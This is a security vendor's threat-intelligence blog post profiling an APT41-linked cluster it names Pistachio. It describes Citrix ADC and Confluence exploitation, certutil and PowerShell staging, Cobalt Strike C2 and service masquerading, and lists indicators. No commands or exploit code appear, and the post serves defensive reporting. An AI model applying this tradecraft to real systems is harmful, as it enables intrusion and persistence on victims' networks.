The ice cream blog series continues by documenting another activity cluster first observed in our dataset in 2019. This threat cluster has been well documented in the security community with, APT41, Lead, Wicked Panda, and Vanadinite demonstrating significant overlap in activity, making it likely that each represents activity involving the same threat group. We are grateful for the contributions of these and other threat researchers who have helped inform the security community’s understanding of this actor.
To catch up on the rest of the series, click the links below:
- Intro: Threat Activity Clusters
- Cluster 1: Mint
- Cluster 2: Mint Sprinkles
- Cluster 3: Strawberry
- Cluster 4: Strawberry Sprinkles
This prominent APT has a footprint across numerous organizations, and the information shared has aided Alert Logic in detecting malicious actions within our customer base.
During our constant threat hunts, we have gleaned information that may complement the existing understanding of this group, due to our unique insight into 40PB of customer threat data ingested monthly. This blog will share Alert Logic’s perspective of this advanced persistent threat.
APTs are difficult to detect and even harder to track, as they recycle and modify indicators and TTPs to evade detection and increase their success rate. Therefore, the activity we have observed is better understood as this flavor having a tendency to perform documented actions, rather than there being a definitive pattern. This is a distinct difference from previous threat flavors documented in this series.
A sophisticated threat deserves a sophisticated flavor, so the Alert Logic identifier for this activity cluster is Pistachio.
Alert Logic threat hunters identified Pistachio during our emerging threat process when active exploits of CVE-2019-19781 and CVE-2021-26084 first surfaced in January 2020 and September 2021, respectively.
This flavor would target exposed confluence servers and Citrix ADC systems, usually preferring to compromise windows-based systems used by organizations in the healthcare, telecom, technology, and video game industries. The confluence and Citrix ADC exploits allowed for full remote code execution, effectively granting the group complete control of the vulnerable server.
Installation and C2
In the instances where Pistachio was observed among Alert Logic customers, the flavor gained initial access and then abused certutil.exe as part of a “living off the land” attack, using the native command line program intended for certificate services to download a batch script (x.bat) from a host controlled by the group.
The batch script runs commands via PowerShell to download further programs, including a dynamic link library (DLL), which is then installed as a windows service.
The malicious service DLL is unpackaged to launch Cobalt Strike to establish command and control (C2) of the compromised machine. The flavor also uses the known hacker tool, Metasploit, usually to advance further into the network. The C2 profiles observed were intended to look like benign internet traffic and were unlikely to be caught or blacklisted when viewed in isolation.
Utilizing the native programs (certutil and PowerShell) helps to bypass preventative controls (such as EDR) as the attacker masquerades as a legitimate program.
It is worth noting that the certutil abuse and subsequent file download(s) was caught in routine threat hunting activities, not as part of a focused emerging threat, threat hunt. Searching for signs of compromise like this helped provide early warning of the Citrix and Confluence emerging threat.
While those exploits were brand new at the time, threat actors cannot rely entirely on novel tactics throughout the kill chain. This demonstrates the necessity to hunt across the kill chain and the complementary relationship of pairing advanced detection capabilities with preventative tools.
Flavor infrastructure is where we have seen the greatest variance. Pistachio frequently moves onto new attacker infrastructure to carry out actions across the kill chain. Monitoring attacker IPs has proven to be inefficient long term, as they are usually only active during small windows.
Pistachio appears to have the ability and resources to take over new hosts and use these in their campaigns. This includes using routers, or an organization’s compromised hosts to take control of more infrastructure, both internally and externally. This is a stark contrast to previous actors we have observed, such as Strawberry, who simply spin up new hosts within the same AWS hosted VPC.
Pistachio, under its many other names, has been determined by other threat researchers as likely a Chinese state sponsored group based on targeted intrusions tending to align with Chinese Communist Party Objectives. Alert Logic has no data to support this attribution, but it has assisted our understanding of the activity cluster.
The geo-locational data of the IP addresses recorded in our dataset and opensource intelligence contain a vast variety of countries with a significant lack of Chinese addresses. The geo-locational data, coupled with the frequent renewal of attacker infrastructure, has led Alert Logic threat hunters to theorize that there may be a concerted effort to use less Chinese IP addresses in order to mask attribution.
Actions on Objectives – and a thank you to OSint
We have not observed any specific AOs in the Alert Logic customer base, thanks to the work of our threat hunters and the intelligence provided by the wider security community, which has enabled us to act quickly when compromise was observed.
Known Exploits Used
- CVE-2021-26084 [exp]
- CVE-2019-19781 [exp]
- Bat files
- Masquerading: Masquerade Task or Service – T1036.004
- Create or Modify System Process: Windows Service – T1543.003
- System Services: Service Execution – T1569.002
- Confluence servers
- Citrix ADC
- Telecom Organizations
- Technology Companies
- Video Game Studios
- 213[.]152[.]165[.]29 [inst]
- 4245c6e0b025d5e34b8aec767bf1d2aa085b7554 (SSL certificate)
Actions on Objectives
n/a in the historic Alert Logic dataset